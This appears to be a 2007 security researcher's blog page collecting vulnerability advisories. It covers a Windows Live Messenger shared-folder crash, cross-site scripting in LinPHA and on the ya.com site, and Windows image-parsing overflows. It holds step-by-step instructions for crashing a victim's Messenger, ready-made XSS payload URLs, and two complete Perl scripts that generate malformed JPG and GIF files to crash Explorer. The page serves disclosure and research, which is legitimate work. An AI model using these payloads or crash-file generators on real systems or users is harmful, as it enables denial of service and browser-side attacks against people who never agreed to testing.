Windows live Messenger malformed file overflow DoS remote exploitation.

Friday, September 21, 2007
##############################################################
Windows live Messenger malformed file overflow remote exploitation.
(windows ole32.dll ms07-024) (windows GDI MS07-046 )
vendor url: http://www.microsoft.com/ , http://get.live.com/messenger/overview
Advisore: http://lostmon.blogspot.com/2007/09/
windows-live-messenger-jpg-overflow.html
Vendor notify:YES Vendor Confirmed:yes(DoS issue) Explotation include:YES
BID:25795
#############################################################

A buffer overflow exists in Windows MSN Live. The GDI engine fails
to representate malformed data in image files resulting in a buffer
overflow. With a specially crafted jpg or wmf or gif file or doc
file or ico, an attacker can cause arbitrary code execution
(not Shure RCE) or a DoS resulting in a loss of integrity.

############
History
############

after install this patch for a vulnerability in windows GDI
MS07-046 i make several probes with some malformed image files
(jpj,gif,wmf,ico,doc) and i have the same result before i install
this patch and after install it :(

###############
versions tested
###############

All of this versions and Windows MSN live 8.1
I don´t know if other versions of windows are prone
vulnerables too , but i think that is vulnerable
all systems related in MS07-046 Microsoft Bulleting.

win xp media Center version 2002 service pack 2
Win XP pro
Win XP home

###############
Solution
###############
No solution was available at this time, but

DON´T SHARE ANY FOLDER IN MSN UTIL
HAVE A SOLUTION OR PATCH !!!!!!

The vendor planing address this issue
in the next service pack.

###############
Timeline
###############

Discovered:20-08-2007
Vendor initial contact:23-08-2007
Vendor response:24-08-2007
Vendor patch:---
Private disclosure:17-09-2007
Public disclosure:

##############
Impact
##############

A remote user can cause a DoS in the aplication.
If the patch for windows meta files (wmf) does not
work correctly , a remote user can execute arbitrari code
but i´m not shure if the RCE can be done.


##########################
Explanation Step By Step
##########################

What we need??

- Two machines with windows msn live 8.1 and with
- Two of the systems related in versions section.
- A malformed image like jpg,gif, or wmf.

Machine 1 => msn 8.1 & windows xp media center 2002 all fully patched.[victim´s]
Machine 2 => msn 81. & windows xp home all fully patched.[evil_attack]

In windows msn 8.1 we have a option to share folders with others contacts.
The first time wen you share a folder with a contact msn ask for sharing,
if you accept the folder is automatic sharing all times.

To look the folder location you can go to my computer/msn
folders/[VICTIM´S]@hotmail.com

and the fisical path is:

C:\Documents and Settings\[YOUR_USER]\Configuración local\
Datos de programa\Microsoft\Messenger\[ATTACKER]@hotmail.com\
Sharing Folders\[VICTIM´S]@hotmail.com

1 - login in msn in the two machines.
2 - machine 2 open a conversation window with machine 1
3 - Machine 2 click in the incon to share a folder.
4 - Mahine 1 accept to share.
5 - put in machine 1 in the share folder a new folder and inside it a
malformed jpg file; but not by msn go to fisicall path and put there ,
because if you drag&drop the image to share folder inside msn,The aplication crash.

6 - close in all machines the share folder.

now you have in the machine 1 in the fisical path for the share folder
a folder with a malformed image.

7 - in machine 2 click in the icon to share and wen msn in machine 1
look for open and send the list of files inside the MSN in the
machine 1 Crash , and if you don´t terminate the proccess
crashing windows too with a Blue screen of death :S

Now you can crash the MSN in the victim´s machine all times wen click
in the icon to share.
The victim need to delete this folder for stop this situation.

OK think moore we need to put a image in the machine victim´s.

Can we put it with no interaction of the victims?...yes
the victim oly need to make one click. :)

if we have a share folder with the victim, and victim and attacker are online...
the victim can put in his local share folder a new folder with the
malformed image,
and in the attacker conversation window apears a new Message what say...

The victim has add files to share folder would do you like to
sincronice or update ?? ...or some similar...

if the attacker click on yes... the MSN on the attacker machine is Crasing.
and now the victim can crash Victim´s MSN all times .
The attacker need to delete de folder with the evil jpg.

i have a eassier way to exploit and/or manipulate the malformed file:

1 share a folder with a contact in msn.
2 close in msn the share folder.
3 open a cmd and go to the fisical path of the share folder.
4 generate the malformed file by perl python or similar.

if the file is generated and you have open a conversation window with
the victim, your msn say "all files are upload" wen your msn finish the
sincronization with the msn victim`s, and in the victim´s MSN say " the
user bla bla bla has update the sare folder" or some similar.

Now the exploit is in your machine and in the machine´s victim.

if you clik on share folder icon, and if you have the exploit in your
machine wen you clik
your MSN crashing , but if you after sincronization, you delete in
your local folder the malformed file... wen you clik in share folder.
wen MSN try to sincronize the share folder in victim´s machine with
your share folder. the MSN on the machine´s victim is crashing.

i think that some of this issues in malformed files...
comming from the extended file attributes.

if any like to profundice on it, here you have two related interesting articles:

First part:

http://lostmon.blogspot.com/2007/06/buffer-overflow-in-extended-file.html

Second part :

http://lostmon.blogspot.com/2007/08/windows-extended-file-attributes-buffer.html

and the related Microsoft bulletins:

Vulnerability in ole32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-024.mspx

Vulnerability in gdi32.dll :

http://www.microsoft.com/technet/security/bulletin/ms07-046.mspx



########################## €nd #####################

Thnx to extrella to be my ligth.
Thnx to Dave from securiy center for his patience.
Thnx to FalconDeOro ( la paciencia, es una virtud, pequeño Jedy)
Thnx to All Lostmon Group Team.
Thnx to N0xTrUm from N0xTrUm Tecnologies http://n0xtrum.blogspot.com/
Thnx To ANELKAOS from http://www.elhacker.net/ for his support.

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....

LINPHA 1.3.1 Multiple Scripts XSS

Friday, September 07, 2007
##########################################
LINPHA 1.3.1 Multiple Scripts XSS
vendor url:http://linpha.sourceforge.net
Advisore:http://lostmon.blogspot.com/2007/09/
linpha-131-multiple-scripts-xss.html
vendor informed:NO exploit available:YES
##########################################


LinPHA is an easy to use, multilingual, flexible photo/image
archive/album/gallery written in PHP. It uses a SQL database
(MySQL/PostgreSQL/SQLite) to store information about your pictures


LinPHA contains a flaw that allows a remote cross site
scripting attack.This flaw exists because the application does
not validate multiple params upon submission to multiple scripts
.This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.


################
Versions
################

LinPHA 1.3.1

################
Timeline
################

Discovered:05-08-2007
disclosure:07-09-2007

###################
Examples
###################
http://localhost/linpha/actions/image_resized_view.php?
imgid=2945"><body><script>alert()</script><h1>lalala</h1></body>&wh=800x600

http://localhost/linpha/search.php?1=1&pn=2
"><script>alert()</script>#tn

http://localhost/linpha/viewer.php?album=etc/passwd">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&order=">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha//search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?1=1&imgid=14013">
<body><script>alert()</script><h1>lalala</h1></body>

http://localhost/linpha/search.php?search_text=a&order=">
<body><script>alert()</script><h1>lalala</h1></body>

Some other params and scripts are afected...

###################### €nd ###############################

Thnx to estrella to be my ligth
Thnx to all Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Ya.com sufre agujeros de tipo XSS

Thursday, August 30, 2007
###################################
Ya.com sufre agujeros de tipo XSS
###################################

La web de Ya.com esta afectada por vulnerabilidades
de tipo cross-site scripting.

Los agjeros se hayan localizados bajo el subdonimio
acceso.ya.com y asi mismo sobre corp.ya.com

Aparte de los aqui mencionados a modo de prueba de
concepto existen algunos mas en algunas otras zonas
dinamicas del portal.

Tras haber intentado en varias ocasiones contactar
con ya.com , en principio ha sido imposible ya que
en su web la una forma de contacto con ellos es
telefonica, y yo no estoy dispuesto a gastarme
mi dinero para reportar fallos en su web;asi pues
me he visto obligado a mandar correos al tum tum
a seguridad, security etc etc @ya.com para ver si
por suerte alguno existia o no ,lo cual veo que no
al no obtener respuesta , o bien simplemente pasan...

Algunos ejemplos de esta explotacion:

https://acceso.ya.com/ayuda/searchfunc.html?si=html
&co=20&sw=[XSS-CODE]&Submit=Buscar


http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=[XSS-CODE]&nombrearea=Programa%20de%20Becas

http://www.corp.ya.com/index.asp?op=58&cat=mod&id=2
&nombreoferta=&nombrearea=Programa%20de%20Becas[XSS-CODE]

##################### €nd ###########################

Thnx to estrella to be my ligth.
Thnx to all Lostmon Team !!!

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)

--
La curiosidad es lo que hace mover la mente....

Windows Extended file attributes buffer overflow Study II

Thursday, August 09, 2007
##########################################################
Windows Extended file attributes buffer overflow Study II
Original:
##########################################################

In a previous article , i write about extended file
attributes:

"A local buffer overflow exists in the windows explorer .
The extended file atributes functions have a small size
of the buffer in 'FileAllInformation(),FileNameInformation'
and other subfunctions in Undocumented functions of NTDLL ,
resulting in a buffer overflow. With a unknow impact."

Original article:

http://lostmon.blogspot.com/2007/06/
buffer-overflow-in-extended-file.html

I Write "this issue could be done in all files"...

Now i go to extend some details moore of my investigation
and the research of this issue.

Look the new vulnerabilities on Microsoft windows GDI and ole32

http://www.securityfocus.com/bid/16167
http://www.securityfocus.com/bid/25207
http://secunia.com/advisories/10020/
http://secunia.com/advisories/10194/
http://osvdb.org/displayvuln.php?osvdb_id=31885
http://osvdb.org/displayvuln.php?osvdb_id=31886
http://osvdb.org/displayvuln.php?osvdb_id=31887

All PoC and all exploits have some details to study.

All files wen explorer crash ,crashing wen try to look
the extended file atributes of any file (*.jpg,*.doc,*.gif,*.wmf)
How to demostrate it ??

All exploits have some similitudes ....
all crafted files crashing at the same point or at the same properties
this is a litle test/study of those exploits / vulnerabilities


############################################
Testing with filemon and EFA.vbs
############################################


####################
Exploit wmf File
####################

Download BID 16167 exploit and unzip it in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the wmf
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

####################
Exploit jpg file
####################

Download BID 25207 exploit and unzip it in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the jpg
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

###################
exploit Gif file
###################

save exploit for Gif file in c:\test

open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the gif
file , crash , or wen put the mouse over...

in the filemon wen the crash is done we have some similar to


Click To full size

filemon mark the overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)

###################
Exploit Doc file
###################

unzip the explorer_crasher.doc in c:\test\
open filemon and include process explorer.exe
and click in apply.
now open c:\test\ and wen explorer looks the EFA for the doc
file , crash , or wen put the mouse over...

in the filemon wen the crash is done filemon mark the
overflow in 'FileAllInformation()' function.

another test with the same file :

save EFA_test.vbs and execute it , the windows scripting host
crash wen try to look extended attribute number 9 (Author).

delete the doc file in a dos command line :)
#################################
LINKS AND FILES NEEDED
#################################

For testing this you need all exploits , filemon and EFA.vbs.

Download filemon :

http://www.microsoft.com/technet/
sysinternals/FileAndDisk/Filemon.mspx

Download Exploit Word file DoS :

http://www.milw0rm.com/sploits/03062007-Explorer_Crasher.tar

Download exploit BID 16167:

http://www.securityfocus.com/data/
vulnerabilities/exploits/WMF-DoS.rar

Exploit BID 25207 :
########################################################
#!/usr/bin/perl

#Bug found and ExpLoitEd by CrazyAngel
# Greets: st0rke, Elite, P0uya_s3rv3r, Aria
# ThnX ALL Shabgard.Org Members Specially Moderators and Clans

print "\nJPG PoC denial of service exploit by CrazyAngel ";
print "\n\ngenerating something.jpg...";
open(JPG, ">./something.jpg") or die "cannot create jpg file\n";
print JPG "\x01\x00\x09\x00\x00\x03\x22\x00\x00\x00\x72\x65\x7A\x61\x2E\x65";
print JPG "\x78\x45\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print JPG "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print JPG "\x00\x00\x00\x00";
close(JPG);
print "ok\n\nnow try to browse folder in XP explorer and wait :)\n";

##########################################################


Save Gif file gdi32.dll DoS :

##########################################################
#!/usr/bin/perl
##########################################################
# Bug Found By ::DeltahackingTEAM
##
# Coded By Reza.Yavari (Dr.Pantagon)
##
#Web Site::Www.Deltahacking.net And Www.DeltaSecurity.ir And Www.PersianWhois.com
##
#Free Upload :: Www.Persianupload.com And Www.Persianupload.net
##
#Email: Dr.Pantagon [A]Deltasecurity.ir
##
# We Are::Dr.Trojan,Hiv++,D_7j,Dr.Pantagon,Impostor,Lord,Vpc,And....All Mem

print "\nGIF PoC denial of service exploit by Dr.Pantagon < Dr.Pantagon@deltasecurity.ir>";
print "\n\ngenerating Art.gif...";
print "\n\nUsage :";
print "\n\n1- Mouse Over Art.gif For Excute Exploit ";
print "\n\n2- Single Click Art.gif For Excute Exploit ";
print "\n\n3- Double Clik Art.gif (Open) For Excute Exploit ";
print "\n\n4- More... ";
print "\n\nYou Can open Art.gif Or Select Art.gif(Single Click) Or Delete Art.gif For Run(Excute) Exploit";
open(gif, ">./Art.gif") or die "cannot create gif file\n";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x9b\x99\x86\xd1\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x95\x99\x99\x99\x99\x99\x99\x99\x98\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\xda\xd4\xdd\xb7\xdc\xc1\xdc\x99\x99\x99\x99\x99";
print gif "\x89\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99\x99";
print gif "\x99\x99\x99\x99\x99\x99\x90\x90\x90\x90\x90\x90\x90\x90";
print gif "\x02\x00\x09\x00\x00\x03\x22\x00\x00\x00\x6\x7\x6\x6\x6\x64";
print gif "\x2D\x49\x07\x00\x00\x00\xFC\x02\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x08\x00\x00\x00\xFA\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
print gif "\x07\x00\x00\x00\xFC\x02\x08\x00\x00\x00\x00\x00\x00\x80\x03\x00";
print gif "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00";
close(gif);
print "ok\n\nok Gif Exploit Creat and run exploit and wait :)\n";

# milw0rm.com [2007-07-23]
########################################################

Save EFA_test.vbs:

#######################
EFA_test.vbs
########################

Dim arrHeaders(35)
Set objShell = CreateObject("Shell.Application")
Set objFolder = objShell.Namespace("C:\test")
For i = 0 to 34
arrHeaders(i) = objFolder.GetDetailsOf(objFolder.Items, i)
Next
For Each strFileName in objFolder.Items
For i = 0 to 34
Wscript.Echo i & vbtab & arrHeaders(i) _
& ": " & objFolder.GetDetailsOf(strFileName, i)
Next
Next
#########################################################

######################## €nd #########################

Thnx to estrella to be my ligth
Thnx To FalconDeOro Hi is investigate and documented with me this issue.
Thnx to Icaro and Badchecksum Team for interesting in research.
Thnx To Jkouns and Jericho for his patience.
Thnx to All osvdb Maglers they are involved in a very nice project.
Thnx to Secunia Research Team They make a Very Good Co-Work with the researchers
Thnx to All Lostmon´s Group Team

--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
 

Browse

About:Me

My blog:http://lostmon.blogspot.com
Mail:Lostmon@gmail.com
Lostmon Google group
Lostmon@googlegroups.com

La curiosidad es lo que hace
mover la mente...

Friends